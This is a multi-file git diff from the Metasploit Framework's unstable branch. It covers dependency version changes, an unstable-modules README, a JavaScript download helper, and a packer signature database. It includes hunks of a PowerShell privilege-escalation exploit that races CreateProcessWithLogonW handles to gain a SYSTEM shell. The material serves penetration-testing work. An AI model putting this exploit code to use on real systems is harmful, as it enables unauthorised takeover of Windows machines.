Remove scrollout_loadlogs_exec for @bcoles

Move #6900 into unstable
Fix unstable branch
2017-04-21 21:24:06 -05:00 · 2016-07-20 15:17:32 -05:00 · 2016-07-20 15:12:45 -05:00 · 2016-07-20 13:10:17 -05:00 · 2016-05-25 19:32:55 -05:00 · 2016-05-25 04:07:09 -05:00
829 changed files with 58635 additions and 19069 deletions
@@ -46,7 +46,6 @@ and Metasploit's [Common Coding Mistakes].
 * **Do** include [console output], especially for witnessable effects in `msfconsole`.
 * **Do** list [verification steps] so your code is testable.
 * **Do** [reference associated issues] in your pull request description
-* **Do** write [release notes] once a pull request is landed
 * **Don't** leave your pull request description blank.
 * **Don't** abandon your pull request. Being responsive helps us land your code faster.

@@ -109,7 +108,6 @@ already way ahead of the curve, so keep it up!
 [console output]:https://help.github.com/articles/github-flavored-markdown#fenced-code-blocks
 [verification steps]:https://help.github.com/articles/writing-on-github#task-lists
 [reference associated issues]:https://github.com/blog/1506-closing-issues-via-pull-requests
-[release notes]:https://github.com/rapid7/metasploit-framework/wiki/Adding-Release-Notes-to-PRs
 [PR#2940]:https://github.com/rapid7/metasploit-framework/pull/2940
 [PR#3043]:https://github.com/rapid7/metasploit-framework/pull/3043
 [pre-commit hook]:https://github.com/rapid7/metasploit-framework/blob/master/tools/dev/pre-commit-hook.rb
@@ -1,7 +1,7 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (4.12.32)
+    metasploit-framework (4.12.15)
      actionpack (~> 4.2.6)
      activerecord (~> 4.2.6)
      activesupport (~> 4.2.6)
@@ -14,17 +14,15 @@ PATH
      metasploit-concern
      metasploit-credential
      metasploit-model
-      metasploit-payloads (= 1.1.19)
+      metasploit-payloads (= 1.1.13)
      metasploit_data_models
-      metasploit_payloads-mettle (= 0.0.6)
+      metasploit_payloads-mettle
      msgpack
-      nessus_rest
      net-ssh
      network_interface
      nokogiri
      octokit
      openssl-ccm
-      openvas-omp
      packetfu
      patch_finder
      pcaprub
@@ -33,56 +31,44 @@ PATH
      rb-readline-r7
      recog
      redcarpet
-      rex-arch
-      rex-bin_tools
-      rex-core
-      rex-encoder
      rex-java
-      rex-mime
-      rex-nop
-      rex-ole
      rex-powershell
      rex-random_identifier
      rex-registry
-      rex-rop_builder
-      rex-socket
-      rex-sslscan
      rex-struct2
      rex-text
      rex-zip
      robots
-      rubyntlm
      rubyzip
      sqlite3
      sshkey
      tzinfo
      tzinfo-data
-      windows_error

 GEM
  remote: https://rubygems.org/
  specs:
-    actionpack (4.2.7.1)
-      actionview (= 4.2.7.1)
-      activesupport (= 4.2.7.1)
+    actionpack (4.2.7)
+      actionview (= 4.2.7)
+      activesupport (= 4.2.7)
      rack (~> 1.6)
      rack-test (~> 0.6.2)
      rails-dom-testing (~> 1.0, >= 1.0.5)
      rails-html-sanitizer (~> 1.0, >= 1.0.2)
-    actionview (4.2.7.1)
-      activesupport (= 4.2.7.1)
+    actionview (4.2.7)
+      activesupport (= 4.2.7)
      builder (~> 3.1)
      erubis (~> 2.7.0)
      rails-dom-testing (~> 1.0, >= 1.0.5)
      rails-html-sanitizer (~> 1.0, >= 1.0.2)
-    activemodel (4.2.7.1)
-      activesupport (= 4.2.7.1)
+    activemodel (4.2.7)
+      activesupport (= 4.2.7)
      builder (~> 3.1)
-    activerecord (4.2.7.1)
-      activemodel (= 4.2.7.1)
-      activesupport (= 4.2.7.1)
+    activerecord (4.2.7)
+      activemodel (= 4.2.7)
+      activesupport (= 4.2.7)
      arel (~> 6.0)
-    activesupport (4.2.7.1)
+    activesupport (4.2.7)
      i18n (~> 0.7)
      json (~> 1.7, >= 1.7.7)
      minitest (~> 5.1)
@@ -92,7 +78,7 @@ GEM
    arel (6.0.3)
    arel-helpers (2.3.0)
      activerecord (>= 3.1.0, < 6)
-    aruba (0.14.2)
+    aruba (0.14.1)
      childprocess (~> 0.5.6)
      contracts (~> 0.9)
      cucumber (>= 1.3.19)
@@ -102,7 +88,7 @@ GEM
    bcrypt (3.1.11)
    bit-struct (0.15.0)
    builder (3.2.2)
-    capybara (2.9.2)
+    capybara (2.7.1)
      addressable
      mime-types (>= 1.16)
      nokogiri (>= 1.3.3)
@@ -123,12 +109,12 @@ GEM
      multi_test (>= 0.1.2)
    cucumber-core (1.5.0)
      gherkin (~> 4.0)
-    cucumber-rails (1.4.5)
+    cucumber-rails (1.4.3)
      capybara (>= 1.1.2, < 3)
-      cucumber (>= 1.3.8, < 4)
+      cucumber (>= 1.3.8, < 3)
      mime-types (>= 1.16, < 4)
      nokogiri (~> 1.5)
-      railties (>= 3, < 5.1)
+      railties (>= 3, < 5)
    cucumber-wire (0.0.1)
    diff-lcs (1.2.5)
    docile (1.1.5)
@@ -167,8 +153,8 @@ GEM
      activemodel (~> 4.2.6)
      activesupport (~> 4.2.6)
      railties (~> 4.2.6)
-    metasploit-payloads (1.1.19)
-    metasploit_data_models (2.0.4)
+    metasploit-payloads (1.1.13)
+    metasploit_data_models (2.0.0)
      activerecord (~> 4.2.6)
      activesupport (~> 4.2.6)
      arel-helpers
@@ -178,18 +164,17 @@ GEM
      postgres_ext
      railties (~> 4.2.6)
      recog (~> 2.0)
-    metasploit_payloads-mettle (0.0.6)
+    metasploit_payloads-mettle (0.0.5)
    method_source (0.8.2)
    mime-types (3.1)
      mime-types-data (~> 3.2015)
    mime-types-data (3.2016.0521)
    mini_portile2 (2.1.0)
-    minitest (5.9.1)
+    minitest (5.9.0)
    msgpack (1.0.0)
    multi_json (1.12.1)
    multi_test (0.1.2)
    multipart-post (2.0.0)
-    nessus_rest (0.1.6)
    net-ssh (3.2.0)
    network_interface (0.0.1)
    nokogiri (1.6.8)
@@ -198,13 +183,12 @@ GEM
    octokit (4.3.0)
      sawyer (~> 0.7.0, >= 0.5.3)
    openssl-ccm (1.2.1)
-    openvas-omp (0.0.4)
    packetfu (1.1.11)
      network_interface (~> 0.0)
      pcaprub (~> 0.12)
    patch_finder (1.0.2)
    pcaprub (0.12.4)
-    pg (0.19.0)
+    pg (0.18.4)
    pg_array_parser (0.0.9)
    pkg-config (1.1.7)
    postgres_ext (3.0.0)
@@ -226,58 +210,30 @@ GEM
      rails-deprecated_sanitizer (>= 1.0.1)
    rails-html-sanitizer (1.0.3)
      loofah (~> 2.0)
-    railties (4.2.7.1)
-      actionpack (= 4.2.7.1)
-      activesupport (= 4.2.7.1)
+    railties (4.2.7)
+      actionpack (= 4.2.7)
+      activesupport (= 4.2.7)
      rake (>= 0.8.7)
      thor (>= 0.18.1, < 2.0)
-    rake (11.3.0)
+    rake (11.2.2)
    rb-readline-r7 (0.5.2.0)
-    recog (2.0.22)
+    recog (2.0.21)
      nokogiri
    redcarpet (3.3.4)
-    rex-arch (0.1.1)
-      rex-text
-    rex-bin_tools (0.1.1)
-      metasm
-      rex-arch
-      rex-core
-      rex-struct2
-      rex-text
-    rex-core (0.1.2)
-    rex-encoder (0.1.0)
-      metasm
-      rex-arch
-      rex-text
    rex-java (0.1.2)
-    rex-mime (0.1.1)
-      rex-text
-    rex-nop (0.1.0)
-      rex-arch
-    rex-ole (0.1.2)
-      rex-text
-    rex-powershell (0.1.66)
+    rex-powershell (0.1.0)
      rex-random_identifier
      rex-text
    rex-random_identifier (0.1.0)
      rex-text
    rex-registry (0.1.0)
-    rex-rop_builder (0.1.0)
-      metasm
-      rex-core
-      rex-text
-    rex-socket (0.1.0)
-      rex-core
-    rex-sslscan (0.1.0)
-      rex-socket
-      rex-text
    rex-struct2 (0.1.0)
-    rex-text (0.2.1)
+    rex-text (0.1.1)
    rex-zip (0.1.0)
      rex-text
    rkelly-remix (0.0.6)
    robots (0.10.1)
-    rspec-core (3.5.4)
+    rspec-core (3.5.1)
      rspec-support (~> 3.5.0)
    rspec-expectations (3.5.0)
      diff-lcs (>= 1.2.0, < 2.0)
@@ -285,7 +241,7 @@ GEM
    rspec-mocks (3.5.0)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.5.0)
-    rspec-rails (3.5.2)
+    rspec-rails (3.5.1)
      actionpack (>= 3.0)
      activesupport (>= 3.0)
      railties (>= 3.0)
@@ -294,7 +250,7 @@ GEM
      rspec-mocks (~> 3.5.0)
      rspec-support (~> 3.5.0)
    rspec-support (3.5.0)
-    rubyntlm (0.6.1)
+    rubyntlm (0.6.0)
    rubyzip (1.2.0)
    sawyer (0.7.0)
      addressable (>= 2.3.5, < 2.5)
@@ -314,12 +270,11 @@ GEM
    timecop (0.8.1)
    tzinfo (1.2.2)
      thread_safe (~> 0.1)
-    tzinfo-data (1.2016.7)
+    tzinfo-data (1.2016.6)
      tzinfo (>= 1.0.0)
-    windows_error (0.0.2)
    xpath (2.0.0)
      nokogiri (~> 1.3)
-    yard (0.9.5)
+    yard (0.9.0)

 PLATFORMS
  ruby
@@ -341,4 +296,4 @@ DEPENDENCIES
  yard

 BUNDLED WITH
-   1.13.2
+   1.12.5
@@ -0,0 +1,27 @@
+**This should never appear in Metasploit Framework's master branch!**
+
+The components under the unstable-* directories are unstable, in that
+they are untested, unverified, or otherwise incomplete. Many may be
+useful, but all require some level of work to get into the Metasploit
+master branch.
+
+In order to load the modules specifically, use:
+
+$ ./msfconsole -m unstable-modules/
+
+Unstable scripts and plugins may be referenced by full pathname
+normally.
+
+In order to help move these out of unstable and into the master
+branch, please fork the Metasploit framework project and send pull
+requests with your fixes back to the unstable branch. If you're
+reading this, you already probably have a GitHub account and are
+already familiar with the mechanics of forking and branching.
+Specifically, you probably know everything discussed on:
+
+https://github.com/rapid7/metasploit-framework/wiki
+
+Thanks for taking a look at these unstable modules!
+
+- Tod Beardsley, todb[at]metasploit[dot]com
+
@@ -155,8 +155,8 @@ Add-Type -TypeDefinition @"
        # CreateProcessWithLogonW --> lpCurrentDirectory
        $GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName

-        $path1 = $env:windir
-        $path1 = "$path1\System32\cmd.exe"
+	$path1 = $env:windir
+    	$path1 = "$path1\System32\cmd.exe"
        # LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
        $CallResult = [Advapi32]::CreateProcessWithLogonW(
            "user", "domain", "pass",
@@ -242,8 +242,8 @@ Add-Type -TypeDefinition @"
    $TidArray = @()

    echo "[>] Duplicating CreateProcessWithLogonW handles.."
-    # Loop 1 is fine, this never fails unless patched in which case the handle is 0
-    for ($i=0; $i -lt 1; $i++) {
+    # Loop Get-ThreadHandle and collect thread handles with a valid TID
+    for ($i=0; $i -lt 500; $i++) {
        $hThread = Get-ThreadHandle
        $hThreadID = [Kernel32]::GetThreadId($hThread)
        # Bit hacky/lazy, filters on uniq/valid TID's to create $ThreadArray
@@ -309,19 +309,6 @@ Add-Type -TypeDefinition @"
            0x00000002, $cmd, $args1,
            0x00000004, $null, $GetCurrentPath,
            [ref]$StartupInfo, [ref]$ProcessInfo)
-
-    #---
-    # Make sure CreateProcessWithLogonW ran successfully! If not, skip loop.
-    #---
-    # Missing this check used to cause the exploit to fail sometimes.
-    # If CreateProcessWithLogon fails OpenProcessToken won't succeed
-    # but we obviously don't have a SYSTEM shell :'( . Should be 100%
-    # reliable now!
-    #---
-    if (!$CallResult) {
-        continue
-    }
-
        $hTokenHandle = [IntPtr]::Zero
        $CallResult = [Advapi32]::OpenProcessToken($ProcessInfo.hProcess, 0x28, [ref]$hTokenHandle)

@@ -344,4 +331,4 @@ Add-Type -TypeDefinition @"
        $StartTokenRace.Stop()
        $SafeGuard.Stop()
    }
-    exit
+    exit
@@ -9,10 +9,25 @@ function ajax_download(oArg) {
    xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
  }

-  xmlHttp.open(oArg.method, oArg.path, false);
-  xmlHttp.send(oArg.data);
-  if (xmlHttp.readyState == 4 && xmlHttp.status == 200) {
-    return xmlHttp.responseText;
+  xmlHttp.open(oArg.method, oArg.path, !!oArg.cb);
+
+  if (oArg.cb) {
+    xmlHttp.onreadystatechange = function() {
+      if (xmlHttp.readyState == 4) { 
+        oArg.cb.apply(this);
+      }
+    };
+
+    xmlHttp.send(oArg.data);
  }
-  return null;
+  else {
+    xmlHttp.send(oArg.data);
+    if (xmlHttp.readyState == 4 && xmlHttp.status == 200) {
+      return xmlHttp.responseText;
+    }
+
+    return null;
+  }
+
+  return xmlHttp;
 }
@@ -0,0 +1,3043 @@
+[Name of the Packer v1.0]
+signature = 50 E8 ?? ?? ?? ?? 58 25 ?? F0 FF FF 8B C8 83 C1 60 51 83 C0 40 83 EA 06 52 FF 20 9D C3
+ep_only = true
+
+[Crypto-Lock v2.02 (Eng) -> Ryan Thian]
+signature = 60 BE ?? 90 40 00 8D BE ?? ?? FF FF 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 31 C9 83 E8 03 72 0D C1 E0 08 8A 06 46 83 F0 FF 74 74 89 C5 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C9 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C9 75 20 41 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C9 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 83 C1 02 81 FD 00 F3 FF FF 83 D1 01 8D 14 2F 83 FD FC 76 0F 8A 02 42 88 07 47 49 75 F7 E9 63 FF FF FF 90 8B 02 83 C2 04 89 07 83 C7 04 83 E9 04 77 F1 01 CF E9 4C FF FF FF 5E 89 F7 B9 55 00 00 00 8A 07 47 2C E8 3C 01 77 F7 80 3F 01 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07
+ep_only = true
+
+[Exact Audio Copy -> (UnknownCompiler)]
+signature = E8 ?? ?? ?? 00 31 ED 55 89 E5 81 EC ?? 00 00 00 8D BD ?? FF FF FF B9 ?? 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? 00 ?? ?? ?? ?? 00 ?? ?? ?? ?? 00 ?? ?? ?? ?? 00 ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? 00
+ep_only = true
+
+[FSG v1.00 (Eng) -> dulek/xt]
+signature = BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 FC B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 41 13 C9 EB 1C 91 48 C1 E0 08 AC E8 22 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 96 33 C9 41 FF 54 24 04 13 C9 FF 54 24 04 72 F4 C3 5F 5B 0F B7 3B 4F 74 08 4F 74 13 C1 E7 0C EB 07 8B 7B 02 57 83 C3 04 43 43 E9 51 FF FF FF 5F BB 28 ?? ?? 00 47 8B 37 AF 57 FF 13 95 33 C0 AE 75 FD FE 0F 74 EF FE 0F 75 06 47 FF 37 AF EB 09 FE 0F 0F 84 ?? ?? ?? FF 57 55 FF 53 04 09 06 AD 75 DB 8B EC C3 1C ?? ?? 00 00 00 00 00 00 00 00
+ep_only = true
+
+[FSG v1.10 (Eng) -> bart/xt]
+signature = BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 41 13 C9 EB 1C 91 48 C1 E0 08 AC E8 22 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 96 33 C9 41 FF 54 24 04 13 C9 FF 54 24 04 72 F4 C3 5F 5B 0F B7 3B 4F 74 08 4F 74 13 C1 E7 0C EB 07 8B 7B 02 57 83 C3 04 43 43 E9 52 FF FF FF 5F BB 27 ?? ?? 00 47 8B 37 AF 57 FF 13 95 33 C0 AE 75 FD FE 07 74 EF FE 07 75 06 47 FF 37 AF EB 09 FE 07 0F 84 1A ?? ?? FF 57 55 FF 53 04 09 06 AD 75 DB 8B EC C3 1B ?? ?? 00 00 00 00 00 00 00 00 00
+ep_only = true
+
+[FSG v1.30 (Eng) -> dulek/xt]
+signature = BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 41 13 C9 EB 1C 91 48 C1 E0 08 AC E8 22 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 96 33 C9 41 FF 54 24 04 13 C9 FF 54 24 04 72 F4 C3 5F 5B 0F B7 3B 4F 74 08 4F 74 13 C1 E7 0C EB 07 8B 7B 02 57 83 C3 04 43 43 E9 52 FF FF FF 5F BB ?? ?? ?? 00 47 8B 37 AF 57 FF 13 95 33 C0 AE 75 FD FE 0F 74 EF FE 0F 75 06 47 FF 37 AF EB 09 FE 0F 0F 84 ?? ?? ?? FF 57 55 FF 53 04 09 06 AD 75 DB 8B EC C3 ?? ?? ?? 00 00 00 00 00 00 00 00 00
+ep_only = true
+
+[FSG v1.31 (Eng) -> dulek/xt]
+signature = BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 BB ?? ?? ?? 00 B2 80 A4 B6 80 FF D3 73 F9 33 C9 FF D3 73 16 33 C0 FF D3 73 23 B6 80 41 B0 10 FF D3 12 C0 73 FA 75 42 AA EB E0 E8 46 00 00 00 02 F6 83 D9 01 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 48 13 C9 EB 1C 91 48 C1 E0 08 AC E8 22 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B6 00 56 8B F7 2B F0 F3 A4 5E EB 97 33 C9 41 FF D3 13 C9 FF D3 72 F8 C3 02 D2 75 05 8A 16 46 12 D2 C3 5B 5B 0F B7 3B 4F 74 08 4F 74 13 C1 E7 0C EB 07 8B 7B 02 57 83 C3 04 43 43 E9 58 FF FF FF 5F BB ?? ?? ?? 00 47 8B 37 AF 57 FF 13 95 33 C0 AE 75 FD FE 0F 74 EF FE 0F 75 06 47 FF 37 AF EB 09 FE 0F 0F 84 ?? ?? ?? FF 57 55 FF 53 04 89 06 AD 85 C0 75 D9 8B EC C3 ?? ?? ?? 00 00 00 00 00 00 00 00 00 88 01 00 00
+ep_only = true
+
+[FSG 1.31 -> dulek/xt]
+signature = BE ?? ?? ?? 00 BF ?? ?? ?? 00 BB ?? ?? ?? 00 53 BB ?? ?? ?? 00 B2 80
+ep_only = true
+
+[FSG v1.33 (Eng) -> dulek/xt]
+signature = BE A4 01 40 00 AD 93 AD 97 AD 56 96 B2 80 A4 B6 80 FF 13 73 F9 33 C9 FF 13 73 16 33 C0 FF 13 73 1F B6 80 41 B0 10 FF 13 12 C0 73 FA 75 3C AA EB E0 FF 53 08 02 F6 83 D9 01 75 0E FF 53 04 EB 26 AC D1 E8 74 2F 13 C9 EB 1A 91 48 C1 E0 08 AC FF 53 04 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B6 00 56 8B F7 2B F0 F3 A4 5E EB 9D 8B D6 5E AD 48 74 0A 79 02 AD 50 56 8B F2 97 EB 87 AD 93 5E 46 AD 97 56 FF 13 95 AC 84 C0 75 FB FE 0E 74 F0 79 05 46 AD 50 EB 09 FE 0E 0F 84 ?? ?? ?? FF 56 55 FF 53 04 AB EB E0 33 C9 41 FF 13 13 C9 FF 13 72 F8 C3 02 D2 75 05 8A 16 46 12 D2 C3 ?? ?? ?? 00 00 00 00 00 00 00 00 00 54 01 00 00 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 01 00 00 6F 01 00 00 00 00 00 00 00 00 00 00 00 00
+ep_only = true
+
+[NoodleCrypt v2.00 (Eng) -> NoodleSpa]
+signature = EB 01 9A E8 76 00 00 00 EB 01 9A E8 65 00 00 00 EB 01 9A E8 7D 00 00 00 EB 01 9A E8 55 00 00 00 EB 01 9A E8 43 04 00 00 EB 01 9A E8 E1 00 00 00 EB 01 9A E8 3D 00 00 00 EB 01 9A E8 EB 01 00 00 EB 01 9A E8 2C 04 00 00 EB 01 9A E8 25 00 00 00 EB 01 9A E8 02 04 00 00 EB 01 9A E8 19 07 00 00 EB 01 9A E8 9C 00 00 00 EB 01 9A E8 9C 06 00 00 E8 00 00 00 00 0F 7E F8 EB 01 9A 8B F8 C3 E8 00 00 00 00 58 EB 01 9A 25 00 F0 FF FF 8B F8 EB 01 9A 0F 6E F8 C3 8B D0 EB 01 9A 81 C2 C8 00 00 00 EB 01 9A B9 00 17 00 00 EB 01 9A C0 0A 06 EB 01 9A 80 2A 15 EB 01 9A 42 E2 EE 0F 6E C0 EB 01 9A 0F 7E C0 EB 01 9A 8B D0 00 85 EB A5 F5 65 4B 45 45 00 85 EB B3 65 07 45 45 00 85 EB 75 C7 C6 00 85 EB 65 CF 8A 00 85 EB D5 FD C0 00 85 EB 7F E5 05 05 05 00 85 EB 7F 61 06 45 45 00 85 EB 7F
+ep_only = true
+
+[PassLock 2000 v1.0 (Eng) -> Moonlight-Software]
+signature = 55 8B EC 53 56 57 BB 00 50 40 00 66 2E F7 05 34 20 40 00 04 00 0F 85 98 00 00 00 E8 1F 01 00 00 C7 43 60 01 00 00 00 8D 83 E4 01 00 00 50 FF 15 F0 61 40 00 83 EC 44 C7 04 24 44 00 00 00 C7 44 24 2C 00 00 00 00 54 FF 15 E8 61 40 00 B8 0A 00 00 00 F7 44 24 2C 01 00 00 00 74 05 0F B7 44 24 30 83 C4 44 89 43 56 FF 15 D0 61 40 00 E8 9E 00 00 00 89 43 4C FF 15 D4 61 40 00 89 43 48 6A 00 FF 15 E4 61 40 00 89 43 5C E8 F9 00 00 00 E8 AA 00 00 00 B8 FF 00 00 00 72 0D 53 E8 96 00 00 00 5B FF 4B 10 FF 4B 18 5F 5E 5B 5D 50 FF 15 C8 61 40 00 C3 83 7D 0C 01 75 3F E8 81 00 00 00 8D 83 E4 01 00 00 50 FF 15 F0 61 40 00 FF 15 D0 61 40 00 E8 3A 00 00 00 89 43 4C FF 15 D4 61 40 00 89 43 48 8B 45 08 89 43 5C E8 9A 00 00 00 E8 4B 00 00 00 72 11 66 FF 43 5A 8B 45 0C 89 43 60 53
+ep_only = true
+
+[PESpin v0.3 (Eng) -> cyberbob]
+signature = EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 B7 CD 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 8B 95 CB 2C 40 00 8B 42 3C 03 C2 89 85 D5 2C 40 00 41 C1 E1 07 8B 0C 01 03 CA 8B 59 10 03 DA 8B 1B 89 9D E9 2C 40 00 53 8F 85 B6 2B 40 00 BB ?? 00 00 00 B9 75 0A 00 00 8D BD 7E 2D 40 00 4F 30 1C 39 FE CB E2 F9 68 3C 01 00 00 59 8D BD B6 36 40 00 C0 0C 39 02 E2 FA E8 02 00 00 00 FF 15 5A 8D 85 1F 53 56 00 BB 54 13 0B 00 D1 E3 2B C3 FF E0 E8 01 00 00 00 68 E8 1A 00 00 00 8D 34 28 B9 08 00 00 00 B8 ?? ?? ?? ?? 2B C9 83 C9 15 0F A3 C8 0F 83 81 00 00 00 8D B4 0D DC 2C 40 00
+ep_only = true
+
+[PeX v0.99 (Eng) -> bart/CrackPl]
+signature = E9 F5 00 00 00 0D 0A C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 0D 0A 20 50 65 58 20 28 63 29 20 62 79 20 62 61 72 74 5E 43 72 61 63 6B 50 6C 20 62 65 74 61 20 72 65 6C 65 61 73 65 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0D 0A C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 0D 0A 60 E8 01 00 00
+ep_only = true
+
+[Special EXE Pasword Protector v1.01 (Eng) -> Pavol Cerven]
+signature = 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 89 AD 8C 01 00 00 8B C5 2B 85 FE 75 00 00 89 85 3E 77 00 00 8D 95 C6 77 00 00 8D 8D FF 77 00 00 55 68 00 20 00 00 51 52 6A 00 FF 95 04 7A 00 00 5D 6A 00 FF 95 FC 79 00 00 8D 8D 60 78 00 00 8D 95 85 01 00 00 55 68 00 04 00 00 52 6A 00 51 50 FF 95 08 7A 00 00 5D 8D B5 3F 78 00 00 6A 00 6A 00 6A 00 56 FF 95 0C 7A 00 00 0B C0 0F 84 FE 00 00 00 56 FF 95 10 7A 00 00 56 FF 95 14 7A 00 00 80 BD 3E 78 00 00 00 74 D4 33 D2 8B BD 3E 77 00 00 8D 85 1D 02 00 00 89 85 42 77 00 00 8D 85 49 02 00 00 89 85 46 77 00 00 8D 85 EB 75 00 00 89 85 4A 77 00 00 8B 84 D5 24 76 00 00 03 F8 8B 8C D5 28 76 00 00 3B 85 36 77 00 00 60 74 1F 8D B5 BD 02 00 00 FF D6 85 D2 75 11 60 87 FE 8D BD 15 78 00 00 B9 08 00 00 00 F3 A5 61 EB 15 8D 85 9F 02 00
+ep_only = true
+
+[SVK Protector v1.32 (Eng) -> Pavol Cerven]
+signature = 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 EB 05 B8 06 36 42 00 64 A0 23 00 00 00 EB 03 C7 84 E8 84 C0 EB 03 C7 84 E9 75 67 B9 49 00 00 00 8D B5 C5 02 00 00 56 80 06 44 46 E2 FA 8B 8D C1 02 00 00 5E 55 51 6A 00 56 FF 95 0C 61 00 00 59 5D 40 85 C0 75 3C 80 3E 00 74 03 46 EB F8 46 E2 E3 8B C5 8B 4C 24 20 2B 85 BD 02 00 00 89 85 B9 02 00 00 80 BD B4 02 00 00 01 75 06 8B 8D 0C 61 00 00 89 8D B5 02 00 00 8D 85 0E 03 00 00 8B DD FF E0 55 68 10 10 00 00 8D 85 B4 00 00 00 50 8D 85 B4 01 00 00 50 6A 00 FF 95 18 61 00 00 5D 6A FF FF 95 10 61 00 00 44 65 62 75 67 67 65 72 20 6F 72 20 74 6F 6F 6C 20 66 6F 72 20 6D 6F 6E 69 74 6F 72 69 6E 67 20 64 65 74 65 63 74 65 64 21 21 21 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ep_only = true
+
+[SVK Protector v1.3x (Eng) -> Pavol Cerven]
